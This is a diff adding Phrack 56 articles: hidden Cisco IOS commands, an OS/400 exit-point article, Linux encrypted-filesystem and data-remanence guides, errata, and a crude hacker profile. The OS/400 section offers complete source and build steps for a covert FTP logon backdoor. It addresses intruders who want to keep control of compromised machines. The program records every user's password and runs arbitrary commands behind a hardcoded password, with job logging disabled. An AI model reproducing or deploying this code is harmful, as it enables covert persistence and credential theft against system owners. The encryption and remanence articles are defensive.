+XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+(in config mode)
+
+@boot system rom
+
+if the system has an image burned in on rom, this command allows you to
+revert to that image instead of the image stored on some other secondary
+media (flash card).
+
+ctalkb(config)#boot system rom
+The 'boot system rom' command is not valid for this platform.
+It has been translated to 'boot system flash bootflash:'  
+
+@boot module   
+
+the command is there, but it doesn't seem to do anything besides barf.
+
+00:34:02: %PARSER-3-BADSUBCMD: Unrecognized subcommand 11 in configure
+command 'boot module a'     
+
+
+@exception-slave dump X.X.X.X      
+
+informs the router where to dump the core image.
+
+@exception-slave protocol tftp
+
+tells the router what protocol to use when dumping the core image.
+
+@exception-slave corefile 
+
+tells the router what to name the corefile.  note that this corefile
+has to be at least 666 on the tftp server for the router to be able to
+write it.
+
+@ip slow-convergence     
+
+i haven't been able to see any difference in the router performance after
+enabling this command.  regardless, it does not look like a command which
+would improve the router performance.
+
+@ip tftp boot-interface          
+
+tells the router what interface to find its image in the case that it
+wants to boot net via tftp.
+
+@loopback diag
+
+  all of these loopback commands allow you to loop the hardware at
+specific points so that you can isolate hardware faults. e.g. this
+is not just a loopback net and loopback local command set.  also,
+not all pieces of hardware can be looped at all the below points.
+
+@loopback dec (at dec chip)
+@loopback test 
+@loopback micro-linear   
+@loopback motorola
+
+@scheduler max-task-time 200 (last val in milliseconds)
+
+this knob allows you to set the number of milliseconds a specific
+process is on CPU before it reports debugging information.  a relatively
+easy way to report which process is hogging.   sh proc cpu is obviously
+the best way to track down cpu hogs while on the router, but this command
+allows you to track down more insidious hogs.
+
+00:13:18: %SYS-3-CPUHOG: Task ran for 308 msec (3/1), process = Virtual
+Exec, PC = 603C9AD8.
+
+@scheduler heapcheck process (memory validation.. after proc)         
+@scheduler heapcheck poll (memory valid after some poll)
+         
+@scheduler run-degraded   (perhaps in a failure mode?)
+
+causes the scheduler to attempt to keep running even in the face of some
+sort of fatal process error.  the default action of IOS is to have this
+knob turned off and to crash the router upon the recognition of a fatal
+error.  this is done on a per-process basis.  obviously, some processes
+are more critical than others and moving the offending process out of the
+scheduler won't really buy you any time or information.
+
+@service internal 
+
+this is a really nifty command.  turning it on in global configuration
+mode allows you to view some previously hidden commands.  turn it on
+by default and you will eventually find some extras.  
+
+some commands are not even accessible unless this is turned on.
+(sh proc all-events fex)
+
+@service slave-coredump       
+	
+	this allows you to dump core when applicable to some slave
+machine for logging purposes.  this does take a long time depending
+on the amount of memory in the router (copying 128MB with varying
+link speeds.  you do the math).  it is important to note that this
+copying occurs before the router enters usable mode, so you basically
+have added quite a bit of delay into the reload time.   the
+exception-slave commands inform the router where to dump the core image.
+
+
+@service log backtrace (provides traceback with every logging instance)
+
+-Traceback= 603C9AE0 603546C0 60354A48 6035CA58 6035C3F4 6035C34C 60373EBC
+603B6D2C 603B6D18
+     
+in bgp config:
+@neighbor ctalkb-out filter-as 100 d
+
+% filter-as is an obsolete subcommand, use filter-list instead  
+
+this is a nifty command in that it gives you a little more insight
+into whats happening.  i would prefer this command even though it 
+has been deprecated in favor of the filter-list command.  reasoning:
+this command is more specific. 
+
+
+in router isis config:
+@partition-avoidance   
+ 
+not quite sure what this does since i don't have a complex isis setup to test. 
+
+
+|0x03|------------------------------------------------------------------------|
+|----------------------- OS/400 Exit Point Programming -----------------------|
+|clever <clever@dhp.com>------------------------------------------------------|
+
+
+Introduction
+
+Exit points enable programmers to embed custom logic in otherwise
+non-configurable system functions.  At a certain stage of its execution, a 
+program with an exit point will execute the programs which have been 
+registered with its exit point, passing relevant parameters to the called 
+programs.  At that time, the exit point program can do anything it likes with 
+the parameters passed to it and modify the behavior of the calling program by 
+passing back values, if it decides to do so.
+
+Exit point programming is somewhat esoteric.  Most people who deal with 
+the AS/400 are not aware of the existence of exit points, and most of those 
+who know about them do not use them.  System administrators who care about 
+security have used them since they became available to improve system 
+security by logging things like user profile creation or limiting the use of 
+system facilities to a subset of the users who could ordinarily make use of 
+them.
+
+Suppose that you have gained access to a typical AS/400 system.  Its
+administrators are concerned about security, but they lack a consistent 
+security plan and the skill to implement it, even if they did.  Even so, the 
+misconfiguration that allows you to gain access may be noticed and fixed at 
+any time.  A new user profile would probably be spotted.  You need a way to
+retain control over the machine that won't be noticed by most people.  Exit
+points do most of the work for you.
+
+One exit point present in the ftp server software is "FTP Server Logon",
+named QIBM_QTMF_SVR_LOGON.  Its parameter format is TCPL0100.
+
+TCPL0100:
+  Application Identifier        4B      Input      
+  User Identifier               *       Input
+  User Identifier length        4B      Input        
+  Authentication String         *       Input
+  Authentication String length  4B      Input
+  Client IP Address             *       Input
+  Client IP Address length      4B      Input     
+  Return Code                   4B      Output
+  User Profile                  10A     Output
+  Password                      10A     Output
+  Initial Current Library       10A     Output
+
+The parameters marked 'Input' are set by and received from the system; these
+fields contain user signon information, which we should log.  The only
+output parameter about which we care in this instance is 'Return Code',
+which we must set to 1, telling the system to proceed with authentication
+and that the password provided must match the actual password of the user
+profile for authentication to succeed.  Other return code values cause the 
+system to do various things that you might find useful.  Consult the 
+documentation if you are curious.
+
+So.
+1. ftp> open x.x.x.x
+   Connected to x.x.x.x.
+   220-QTCP at x.x.x.
+   220 Connection will close if idle more than 5 minutes.
+   Name (x.x.x.x:root): werd
+   331 Enter password.
+   Password: f.u.c.k.493 
+2. The exit program is called.  The server passes it the parameters mentioned
+   above.
+3. The exit program does whatever it likes.  It sets the 'Output' parameters, 
+   if it likes.  The exit program returns.
+4. The server considers the parameters passed back to it and does whatever 
+   is indicated by those parameters.
+
+Below is a stripped-down version of one tool I use for this.  It isn't
+hidden.  It should only be used on boxes whose administrators are somewhere 
+between 'Don't Care' and 'Making A Clumsy Effort At Security'.
+That is to say, most of them.
+
+Names/types.
+F01     RPGLE
+F02     CLLE
+FP      PF
+
+Creating.
+CRTPF FILE(x/FP) SRCFILE(x/x) TEXT(*BLANK)
+CRTRPGMOD MODULE(x/F01) SRCFILE(x/x) DBGVIEW(*NONE) OUTPUT(*NONE)
+CRTCLMOD MODULE(x/F02) SRCFILE(x/x) OUTPUT(*NONE) LOG(*NO) DBGVIEW(*NONE)
+CRTPGM PGM(x/F) MODULE(x/F01 x/F02) TEXT(*BLANK) ALWUPD(*NO) USRPRF(*OWNER)
+DLTMOD MODULE(x/F01)
+DLTMOD MODULE(x/F02)
+Put F and FP somewhere QTCP can find them.  QUSRSYS, maybe.
+Register x/F with QIBM_QTMF_SVR_LOGON using WRKREGINF.
+Restart ftp.
+
+Using.
+The command goes in the user field.  The special authorization string goes 
+in the password field.  Normal signons get logged in FP.  Ignore the
+error; data area TEST does get created in QGPL.
+ftp> open x.x.x.x
+Connected to x.x.x.x.
+220-QTCP at x.x.x.
+220 Connection will close if idle more than 5 minutes.
+Name (x.x.x.x:root): crtdtaara qgpl/test *dec
+331 Enter password.
+Password: itsmeclever
+530 Log on attempt by user CRTDTAARA rejected.
+ftp: Login failed.
+Remote system type is .
+ftp>
+
+Code.
+(F01)
+     FFP        O  A E             DISK
+
+     D S               c                   'itsmeclever'
+     D
+     DParms            pr                  extpgm('F01')
+     D AppID                          9b 0
+     D UsrID                        100a
+     D UsrIDLen                       9b 0
+     D AutStr                        32a
+     D AutStrLen                      9b 0
+     D ClntIP                        15a
+     D ClntIPLen                      9b 0
+     D Rcd                            9b 0
+     D UsrPrf                        10a
+     D Pwd                           10a
+     D InlCurLib                     10a
+     D
+     DParms            pi
+     D AppID                          9b 0
+     D UsrID                        100a
+     D UsrIDLen                       9b 0
+     D AutStr                        32a
+     D AutStrLen                      9b 0
+     D ClntIP                        15a
+     D ClntIPLen                      9b 0
+     D Rcd                            9b 0
+     D UsrPrf                        10a
+     D Pwd                           10a
+     D InlCurLib                     10a
+     D
+     DLog              pr
+     D Type                          10a   value
+     D Text                         200a   value
+     D
+     DExcCmd           pr
+     D Cmd                          100a   value
+
+
+     C                   if        %subst(AutStr:1:AutStrLen) = S
+     C                   callp     ExcCmd(%subst(UsrID:1:UsrIDLen))
+     C                   eval      *inlr = *on
+     C                   return
+     C                   endif
+     C
+     C                   callp     Log('FTP':
+     C                                 %subst(UsrID:1:UsrIDLen)+ ' '+
+     C                                 %subst(AutStr:1:AutStrLen)+ ' '+
+     C                                 %subst(ClntIP:1:ClntIPLen))
+     C
+     C                   eval      Rcd = 1
+     C
+     C                   eval      *inlr = *on
+     C                   return
+
+
+     PLog              b
+     D                 pi
+     D Type                          10a   value
+     D Text                         200a   value
+     C                   time                    FPTS
+     C                   eval      FPTYPE = Type
+     C                   eval      FPTEXT = Text
+     C
+     C                   write     FPR
+     P                 e
+
+     PExcCmd           b
+     D                 pi
+     D Cmd                          100a   value
+     C                   callb     'F02'
+     C                   parm                    Cmd
+     P                 e
+
+- - - - - - - - - -
+
+(F02)
+	     PGM        PARM(&COMMAND)
+	     DCL        VAR(&COMMAND) TYPE(*CHAR) LEN(100)
+
+	     MONMSG     MSGID(CPF0000) EXEC(GOTO CMDLBL(ERROR))
+
+	     CHGJOB     LOG(0 99 *NOLIST) LOGCLPGM(*NO)
+	     CALL       PGM(QCMDEXC) PARM(&COMMAND 100)
+
+ERROR:
+	     ENDPGM
+
+- - - - - - - - - -
+
+(FP)
+     A          R FPR
+     A            FPTS          14S 0
+     A            FPTYPE        10A
+     A            FPTEXT       200A
+
+
+Hope this helps someone.
+
+clever <clever@dhp.com>
+20000222
+
+
+|0x04|------------------------------------------------------------------------|
+|---------------------- Linux and Encrypted Filesystems ----------------------|
+|phunda mental <phundie@yahoo.com>--------------------------------------------|
+
+Most people don't realize it, but Linux has incredibly robust support
+for encrypted filesystems. This functionality is not present in the
+stock kernel due to U.S. export regulations, but it can be easily
+added by obtaining the patchset for your kernel version from
+www.kerneli.org. 
+
+In this article, I will present a quick introduction to setting up
+strong encryption within the Linux kernel, and then I will present
+a few configurations that allow for seperatly encrypted home directories
+for each user, encrypted disk partitions, etc. 
+
+First, you must download util-linux-2.9e.tar.gz[1], and the kernel
+source patches. For the purposes of this article, I'll assume you are
+running kernel 2.2.4; therefore you would get patch-int-2.2.4.1.gz[2].
+
+In /usr/src do ln -s linux lin.2.2.4 (the patch expects this to be
+the name of the source directory) and apply the patch with
+zcat patch-int-2.2.4.1.gz | patch -p0.
+
+Now look in linux/Documentation/crypto. There are some patches in
+there to Linux utilities. Unpack the util-linux distro, apply the
+necessary patch, and build the new utilities. You'll need to install
+the new losetup and mount commands. Remember that mount needs to be
+suid root if you want users to have the ability to mount encrypted
+volumes. 
+
+Now build a kernel with make menuconfig, and take a look at the dox in the
+Documentation/crypto directory. You'll notice that the kernel patches 
+give support for Blowfish, DES, DFC, IDEA, MARS, RC6 and Serpent. These
+ciphers can be used by the networking code, or the loopback device.
+The loopback device also has special support for CAST128 and Twofish.
+
+Once you have your new kernel up and running, you can make a blowfish 
+encrypted volume like so:
+
+$ dd if=/dev/zero of=vol.img bs=1024 count=2000
+$ losetup -e blowfish /dev/loop0 vol.img
+
+Losetup will prompt you for a passphrase. This passphrase is hashed with
+RIPEMD-160 in order to key the cipher. 
+
+$ mkfs.ext2 /dev/loop0
+$ losetup -d /dev/loop0 #disconnect the loopback device
+
+All of the preceding commands can be issued as a user, to actually
+mount the volume, you will need root status, or the appropriate line
+in /etc/fstab.
+
+# mount vol.img /mnt -o encryption=blowfish
+
+Mount will prompt you for a passphrase, enter the one you gave to
+losetup, and the volume will get mounted on /mnt. 
+
+In order for user joe to mount ~/.img on ~/secure
+a line in fstab like this is needed:
+
+/home/joe/.img /home/joe/secure ext2 noauto,user,rw,exec,encryption=blowfish
+
+Now joe can mount his volume with the command "mount ~/secure".
+
+A similar tactic can be used to have joe's entire home directory
+encrypted.
+
+Make a directory called /usr/imgs/joe and let the directory "joe" be
+owned by user joe. Place an encrypted img called home.img in /usr/imgs/joe
+and modify /etc/profile to check if the user's home directory image
+exists, and if it does, mount the encrypted image onto /home/$USER
+(if it is not already mounted). Then, all that is needed is an
+appropriate line in /etc/fstab to allow joe to mount onto /home/joe. 
+
+I personally use this scheme to keep my home directory encrypted on
+my machines. When I log in, /etc/profile gets executed and it asks
+me for the passphrase needed to mount my home directory. A crontab
+periodically runs and tries to unmount my home directory, so that
+when I log out and any jobs I left running end, my home directory will
+get unmounted. 
+
+If you use xdm to automatically launch X on boot up, then you will
+need to modify Xsession in the xdm directory to launch an xterm
+that executes the mount command so that the user can mount his home
+directory before his ~/.xsession gets executed. 
+
+Consistent with the UNIX philosophy that a device is a file, Loopback
+encryption also works for block devices.
+
+To encrypt disk partitions, Linux will need a small unencrypted root
+partition (just enough for the kernel, /dev, /etc, /lib and the basic
+binaries), maybe 15 or 20 meg. 
+
+/dev/hda2 will contain a filesystem that houses /usr, /var, /home and
+whatever else you have. It will get mounted on /fs/hda2. You can set this
+filesystem up like so:
+
+$ losetup -e blowfish /dev/loop0 /dev/hda2
+$ mkfs.ext2 /dev/loop0
+$ mount /dev/loop0 /fs/hda2
+
+Now you can copy all of /usr and everything to /fs/hda2 and just symlink
+/fs/hda2/usr to /usr so that everything works. Alternatively, if you
+have seperate partitions for /usr, /var, and /tmp you can set them
+up as individual partitions. 
+
+Set up your fstab as follows:
+
+/dev/hda2 /fs/hda2 ext2 defaults,encryption=blowfish 0 0
+
+Now, when you boot, you will get prompted for the passphrase needed
+to mount /fs/hda2. An attacker will get virtually nothing from your
+machine.. they won't even know what applications you have installed. 
+
+I use a similar scheme to keep the contents of removable media and
+PCMCIA flash cards encrypted. 
+
+The kernel patches have other applications besides encrypted filesystems.
+The patches give support for ENskip, and a tunneling hack which allows
+encrypted IP through UDP called CIPE. Check out kerneli.org for more
+info on this stuff. 
+
+Credit, and thanks go to the kernel and patch set maintainers. 
+
+References:
+
+1. ftp://ftp.aanet.ru/pub/Linux/utils/util-linux-2.9e.tar.gz
+2. ftp://ftp.kerneli.org/pub/kerneli/v2.2/patch-int-2.2.4.1.gz
+
+
+|0x05|------------------------------------------------------------------------|
+|------------------------------ Data Remanence -------------------------------|
+|phunda mental <phundie@yahoo.com>--------------------------------------------|
+                                      
+   So, you've encrypted all your goodies with 3DES, selected strong
+   passphrases, and now you are content to sit back and have a beer,
+   knowing that your stuff is secure, right?
+   
+   Yeah. Sure it is.
+   
+   We are facing the problem of data remanence, and it's a bitch. Strong
+   crypto only protects the ciphertext; if the plaintext is sitting
+   around on your hard drive you're still screwed.
+   
+   Data remanence, as the name implies is the residual remains of data
+   after it is has been deleted, cleared or purged. In this document, the
+   term "deleted" refers to the normal OS-supplied delete command. Clearing
+   data refers to a process that attempts to destroy data such that it
+   cannot be reconstructed with normal OS-supplied commands or functions,
+   including specially created software. Purging refers to a process
+   (generally in hardware) that attempts to defeat all of the above
+   methods of reconstruction, along with laboratory-based reconstruction
+   techniques.
+   
+   Obviously, DR occurs in many forms, and can be exploited in a few
+   different ways.
+   
+                              Software Methods
+                                      
+   The first way that DR can bite us in the ass is one that any competent
+   DOS/Windows user should know about: the undelete command. The standard
+   MS delete just kills the pointer to the file in the FAT, while the
+   data itself still sits on the disk. Undelete just restores that
+   pointer, and we can get some (or all) of those data bits back.
+   
+   Well, depending on which color hat we are wearing at the moment, this
+   may be helpful. If you are snooping on some alien machine, remember to
+   try undelete when looking for interesting files. Else, get a program
+   that can help you clear the data. In a pinch, defragging a hard drive
+   can sometimes defeat something like undelete (depending on how the
+   OS in question works).
+   
+   Awhile back I was sitting in IRC, discussing DR under Linux. The
+   standard response that I got was that since ext2 (the Linux
+   filesystem) doesn't operate like FAT, the undelete-type practice can't
+   be done and so we have nothing to worry about. This simply isn't true.
+   
+   Under linux, do the following (you may need root, depending on how you
+   configured your setup):
+   
+        dd if=/dev/zero of=disk.image bs=1024 count=300
+        mkfs.ext2 disk.image
+        mount disk.image /mnt -o loop
+        cd /mnt
+
+   We just made a 300k looped filesystem, and mounted it on /mnt. Now CD
+   to /mnt and create a file with some known text in it .. try:
+
+        ps aux > sensitive.file
+        sync
+        rm sensitive.file
+
+   Now, we've deleted our sensitive file, but as will be demonstrated,
+   this file has not been cleared.
+   
+   Now umount /mnt and do:
+        strings < disk.image | grep USER
+
+   You'll see some text from the ps.
+   
+   Now, if your gear got confiscated imagine someone just running this
+   command on /dev/hda1, or whatever. Don't think DoJ wouldn't pay people
+   to weed through all the junk to obtain a few juicy bytes, or run some
+   nice pattern matching software on the strings output to find stuff
+   that looks interesting.
+   
+   Or, maybe you don't want the contents of a file .. maybe you want a
+   passphrase, or the internal state of an RNG or a cipher?
+   
+   Dig around in the swap partition, maybe you'll get lucky.
+   
+   This is an example of what DoD calls a "keyboard attack" in the "green
+   book[1]." It is an attack to exploit the remnant data on a system
+   using a software method. We need a clearing technique here too, and a
+   good way is to zero the actual bits of the file; ext2 will eventually
+   support this internally[2], but for now you can just rm the file and
+   then make a new file of all zeros that fills the entire disk. Lets try
+   that.
+
+        mount disk.image /mnt -o loop
+        cd /mnt
+        dd if=/dev/zero of=output bs=100k
+        #wait for error
+        sync
+        rm output
+
+   Now umount the disk.image and run strings on it again. You'll notice
+   that the ps output is gone. You'll also notice that some of the the
+   filename is still there. If the file is under some sub-directory, you
+   can rmdir the directory and use the above method. If the file is at
+   root-level, you're hosed: people can see your filename.
+   
+   Overwriting the file's bits one-for-one with zeros insures that one
+   will not be able to read the data back with the recording device
+   itself; thus software, or "keyboard" attacks are successfully defeated
+   by such software measures.
+   
+   It is a good practice to create a script that checks /proc/meminfo
+   under Linux. If there is enough RAM free to hold any crap floating in
+   swap, then free the swap partition, zero it (or use other techniques,
+   discussed below), make a new swap partition and reattach it. This
+   could be put in a cron job that runs at off-peak hours.
+   
+   There are also programs like "wipe.com" (DOS)[3], and "Burn" (Mac)[4]
+   that wipe the bits of certain files, allowing a more controlled (and
+   thus faster) method of wiping remnant data. I don't know of a way to
+   securely wipe files under Linux other than by filling the disk. The
+   programs that I found that report to do so fail, and I can't think of
+   a reliable way to do it outside of ext2.c. 
+   
+                              Hardware Methods
+                                      
+   There is a third type of attack, however, that does not depend on what
+   the device (say, a hard disk) claims is on the media. This type of
+   attack analyzes the media directly; we'll call it a laboratory attack.
+   
+   A laboratory attack is highly theoretical, but we had better talk
+   about it anyway.
+   
+   The first thing we have to remember is that digital media isn't purely
+   digital: we record our bits on an essentially analog medium, which is
+   precisely why we need stuff like MFM (modified frequency modulation)
+   encoding; an actual DC level would erase data, not record it.
+   
+   So, lets talk about disks, and cover some magnetic recording
+   properties real quick. I'm going to be fast and loose with the
+   electronics, I know it is terribly inaccurate; we just need the basic
+   concepts here.
+   
+   In general, magnetic recording is achieved by issuing a magnetic
+   charge onto some ferrous-type material with an electromagnet. To read
+   the data back, the juice to the electromagnet is shut off, and the
+   disk spins by the coil of the magnet, which induces a voltage in the
+   electromagnet, effectively making a small generator. Now, for the sake
+   of accuracy we don't just spit bits out into the magnetic medium,
+   because DC levels don't work with transformers; which is what our
+   read/write head is, basically. So we need to encode it in an analog
+   signal using some modulation technique. For the sake of argument, lets
+   say our disk is using something like frequency shift keying (FSK).
+   In reality, our drives don't do this, but our modems do. I'll use FSK
+   since it is easier to talk about, and easy for newbies to understand.
+   
+   The way we encode our data is to take every digital one and play an
+   analog tone for some time, T, and some other tone for a digital zero,
+   also for some time T. Maybe we encode 0 as 2600 Hz and 1 as 2000 Hz
+   (the Kansas City standard for storing digital info on cassette tape is
+   0 = 2400 Hz and 1 = 1200 Hz).
+   
+   The reason I'm reducing this to a simplified audio analogy will soon
+   be obvious.
+   
+   If you record over a commercial cassette tape with a shitty tape
+   recorder, where there are periods of silence in your recording you may
+   hear the original commercial tune. This remnant signal is there all
+   the time, not just during silence.
+   
+   What has happened is that the magnetic flux delivered by the
+   read/write head of your tape recorder was not powerful enough to
+   completely change the polarization of the magnetic particles on the
+   tape for the time that the particles were exposed. Those particles act
+   in a predictable way, and if we know their current state, and the
+   signal applied to them the last time, we can recover the previous
+   state. Chock this one up to magnetic hysteresis, it could also be due
+   to the head of the tape recorder not being aligned perfectly. More on
+   this option below.
+
+   If a particle on a disk has a current polarization strength of A,
+   and we know what sort of flux was applied to the particle (which we
+   can find by examining the read/write head) then we can find the
+   the state of the particle prior to the last write to it, which allows
+   us to reconstruct the data.
+
+   Real world bit recover would simply require looking at these particles
+   and taking into account the encoding scheme used. The SFS (Secure
+   File System) documentation gives a good description of many different
+   encoding schemes.    
+   
+   As I said, this is a theoretical attack. I am not aware of it ever
+   actually having been used to recover data.
+   
+   How can we defeat this attack? By overwriting the data many times.
+   
+   If we overwrite our data many times, the stored charge on the particle
+   gets constantly closer to the upper-end ideal value, which disguises
+   the data "underneath." We can use several applications of random bits,
+   and then several applications of 00h's and FFh's to overwrite the data.
+   
+   The random bits insure that the attacker doesn't find a pattern. The
+   multiple applications of FF expose the particles to the magnetic flux
+   for a longer period of time. Each application gets those particles
+   closer and closer to the ideal representation of FF. The truly
+   paranoid will want to do all of this several times. Some recommend
+   writing zeros after the ones. This is probably pure paranoia, and it
+   might be a good idea.
+   
+   As alluded to above, there is another type of data remanence that can
+   be attacked in the lab due to variance in the position of the
+   read/write head.
+   
+   As the disk spins, the head will float over different portions of the
+   disk each revolution. When a write occurs, it may charge certain
+   particles and on an overwrite it may miss some of those particles,
+   leaving the original information behind for exploitation by the lab.
+   This lets an attacker read further back into the data record than by
+   weeding out signals by cancellation, and is probably easier to perform
+   in some respects.
+   
+   We have no control over this whatsoever in software. To protect
+   against this attack requires either degaussing of the media, or
+   encryption of the entire device from the first moment it is used until 
+   the last.
+   
+   Using encryption stamps out all of the above problems in one clean, 
+   elegant stroke.
+   
+   Imagine a device that sits in-line between your IDE (or SCSI) adapter
+   and the disk controller of the drive. All attempts by the PC to
+   negotiate with the drive are intercepted by this device, and the data
+   is either encrypted or decrypted as needed and sent along. Thus
+   everything that ever touches the drive: file system formatting, the OS
+   ... everything gets encrypted and stored. The entire operation would
+   be transparent to the host computer, and independent of its
+   processing. The user merely gives a key to this controller at start
+   up: maybe there is a keypad embedded into a 5.25" faceplate that is
+   mounted on the computer's case.
+   
+   Such a hardware solution not only takes care of data remanence issues
+   but also helps to secure  the computer as a whole: with the partition
+   table, and OS encrypted, the machine cannot boot without the user
+   having set up the in-line filter with the correct key.
+   
+   Can a well funded adversary pull off a laboratory attack like those
+   discussed here? Probably. So if you're not using some form of
+   encryption, you might want to start thinking about it. For the stuff
+   that no one but you can know about, keep the plaintext on floppies
+   and the ciphertext on your hard drive. Floppies can be destroyed or
+   degaussed easily. Remember to watch your swap partition though; it is
+   probably wise to disengage swap when manipulating sensitive material.
+   Best of all, RAM is cheap. Buy 256M of it and give up swap space
+   completely.
+   
+   Against a sufficiently powerful attacker who has your hard drive, you
+   are in a world of hurt without in-line encryption. Just how powerful
+   "sufficiently powerful" needs to be to actually make this stuff work
+   is open to speculation.
+   
+   Notes:
+   1. NCSC-TG-025 "A Guide to Understanding Data Remanence in Automated
+   Information Systems" http://www.geekstreet.com/green.html
+   
+   2. This was all tested with linux kernel version 2.0.35. I do not know
+   if 2.1.* will ever have a newer ext2 or not. Look into the chattr
+   command on your machine, and dig into the kernel source to see if the
+   ext2 code does anything or not. On 2.0.*, it does nothing.
+   
+   3. From the No-where utilities, get it from your favorite HP filez
+   site.
+   
+   4. Burn is available from the Info-Mac archives.
+
+|0x06|------------------ Phrack 55 Addendum and Errata -----------------------|
+|-----------------------------------------------------------------------------|
+
+P55-14@71:
+
+I would like to make the following correction in my article "A GPS Primer"
+from Phrack 55.  The Teledesic project is _not_ a MEO satellite venture,
+but rather, it uses Low Earth Orbit (LEO) satellites.  Thanks to Eric Rachner
+for pointing this out.
+
+    [ Thankz to e5 for submitting this correction. ]
+
+P55-18:
+
+File 18 was erroneously listed as file 17.
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/4.txt b/phrack56/4.txt
new file mode 100644
index 0000000..da3ee7e
--- /dev/null
+++ b/phrack56/4.txt
@@ -0,0 +1,414 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x04[0x10]
+
+|------------------------------ P R O P H I L E ------------------------------|
+|-----------------------------------------------------------------------------|
+|----------------------------------- sw_r ------------------------------------|
+
+The Phrack Prophile iz intended to be a short biography on the indiviual in
+question.  It'z Phrackz way to recognize that this person has done something
+worthy of mention in some capacity.  More or less a soap-box, The Prophile
+givez the person a chance to spout off about whutever they want and aggrandize
+themselvez to their heart'z content.  This iz *their* time to shine.
+
+|------------------------------ P E R S O N A L ------------------------------|
+
+|-Handle -------------| Shockwave Rider 
+|-Previouz handlez ---| The Phelon, cpmhaqr, guest_, master blaster, s1thl0rd,
+                        others
+|-Handle origin ------| 1975 book by John Brunner
+|-Call him -----------| Varies depending on who you are
+|-Reach him ----------| Don't call me, I'll call you .. (email: swr@gti.net)
+|-Date of birth ------| 5/16/80
+|-Height -------------| 5'10"
+|-Weight -------------| 170
+|-Eye Color ----------| Brown
+|-Hair Color ---------| Black
+|-Cool crap owned ----| one line isn't gonna do this justice.. ;)
+|-Sitez I run --------| various private systems
+|-URLz ---------------| the web is gay.  but check these urls out anyway:
+                        http://www.suzie.org
+                        http://www.velkro.net/swr
+
+
+|----------------------------- F A V O R I T E Z -----------------------------|
+
+
+|-Women --------------| 
+
+Brunettes with class, wit, and intelligence.  hi suzie!@ 
+
+
+|-Carz ---------------| 
+
+As of this writing, I don't really drive.. once I settle into my new location,
+I plan to purchase a new vehicle.  (I've always been into cars and performance
+vehicles, so it'll be something FAST!@).  I have tons of 'favorite' cars, but
+among the favorite of the favorites at the moment are the Porsche 911, Dodge
+Viper, Porsche 959 (the only reason it doesn't win hands down is 'cuz it's
+still not street-legal, which sucks) & Acura's NSX-T.  
+
+
+|-Foodz --------------|
+
+All kinds - I'm Indian, so naturally Indian's my favorite.. but I also love
+Italian, Thai, Chinese, etc. My favorite foods overall are probably steak and
+pizza.  If made right, I could live on both forever without tiring of either -
+though I'd probably want Indian food occasionally (of course).
+
+
+|-Alcohol ------------|
+
+Wayyy too much to list here.  I like good beer, strong whiskey.. and pretty
+much anything else as long as it's wet & alcoholic(!@).
+
+
+|-Music --------------|
+
+Major hip-hop fan.  I'm also into hard rock/heavy metal, classical.. pretty
+much everything, except for the perennial exception that is Country.  Favorite
+bands/groups off the top of my head include -
+
+NWA, Tribe Called Quest, Eazy-E, Beastie Boys, Nirvana, Tool, Eric B+Rahkim,
+Slick Rick, Metallica, Korn, Beck, Ice Cube, KRS-ONE, Public Enemy, Front 242,
+Guns N Roses, Schooly D, Cypress Hill, Led Zeppelin, Wu-Tang Clan, MC Eiht,
+MC Ren, Garbage (Shirley Manson r000lz), NIN, Toadies, Aerosmith, Sir Mixalot,
+Me First & The Gimme Gimmes, DR Octagon, DJ Rectangle, Eminem, Weird Al,
+Motley Crue, Mr. Bungle, Red Hot Chili Peppers, Gang Starr, Run-DMC..
+
+
+|-Moviez -------------|
+
+HEAT, Goodfellas - pretty much anything with DeNiro or Pacino in it, GodFather
+I, Pulp Fiction, Strange Brew, Bill & Teds * (classics), South Park,
+El Mariachi
+
+
+|-Authorz ------------|
+
+quick list - 
+
+Fyodor Dostoevsky (Crime & Punishment, Brothers Karamozov)
+Dave Barry (Everything) 
+Joseph Heller (Catch-22)
+WR Stevens (TCP/IP Illus 1-2, others)
+J.D. Salinger (Catcher In the Rye)
+George Orwell (1984, Animal Farm)
+John Brunner (Shockwave Rider)
+J.R.R. Tolkien (I loved the Lord of the Rings Trilogy when I was a kid, and 
+"The Hobbit" also), 
+Ray Bradbury (Something Wicked This Way Comes)
+Robert Silverberg (the Pontifex Valentine and  Gilgamesh books.. part of
+my fantasy fiction phase, around the same time as Tolkien)
+Victor Harris (The Book of Five Rings), 
+Nicholas Pileggi (WiseGuy), 
+Sun Tzu (The Art of War), 
+Chris Drake & Kimberley Brown (PANIC!, the most readable tech book I've
+ever read - which is still incredibly useful)
+Neal Stephenson (Snowcrash)
+William Gibson (Everything)
+
+
+|-Turn ons ------|
+
+Tits (all shapes, sizes, colors & flavors), legs,(long and smooth), platform 
+sandals, belly button piercings, long dark hair, two chicks doing it with each
+other, summer dresses, and of course intelligence + sense of humor.. (those
+are all in reference to women)
+
+
+|-Turn offs ----|
+
+Anal retentiveness, pedantry, miserliness, posing/pretentiousness, stupidity 
+(those apply to both sexes).  
+
+
+|-Passions -----|
+
+pea!  (no, not peaboy.. schmucks)
+
+Phones.  UNIX & VMS internals.  Learning new programming languages and
+operating systems.  
+
+Fast cars, clever & beautiful women, good music, Guinness, good food, winter,
+spring, summer, fall, nights, sunsets, sunrises, good books, sleeping, ms.
+pacman coffee tables, cycling, coca-cola, mountain dew, water slides, learning,
+booze, sex/drugs/rocknroll, ice cream, weaponry, playing football, friends,
+video games.. anything as long as it's fun  
+
+
+|----------------- M E M O R A B L E   E X P E R I E N C E Z -----------------|
+
+Buying my first modem, and installing it.  Installing QModem & calling my
+first BBS.
+
+Being introduced to the concept of hacking/phreaking by a local sysop (who
+I am still the best of friends with today).  He told me I should download 
+Phrack ('get phrack.. that zine rocks d00d, it has the best philes!').  So
+I dl'd the latest issue at the time, which was Phrack 46.  
+
+PBXes (System75s, SL-1s, Rolms, DataStar & all the rest..)
+
+Setting up my first Alliance teleconference (0-700-456-1000)
+
+CBI 
+
+Writing my first t-file
+
+Figuring out how to spawn DCL shells from captive and guest accounts.
+
+On a dialup UNIX machine, in a distant galaxy, a long, LONG time ago.. the
+first '#' prompt I ever saw.
+
+First NUI (it was on sprintnet)
+
+First sniffer log (sunsniffer r0ckz)
+
+First time on a DMS-100 
+
+First unpublished exploit (thanks to Scott Chasin for his generous - albeit
+involuntary - donation :))
+
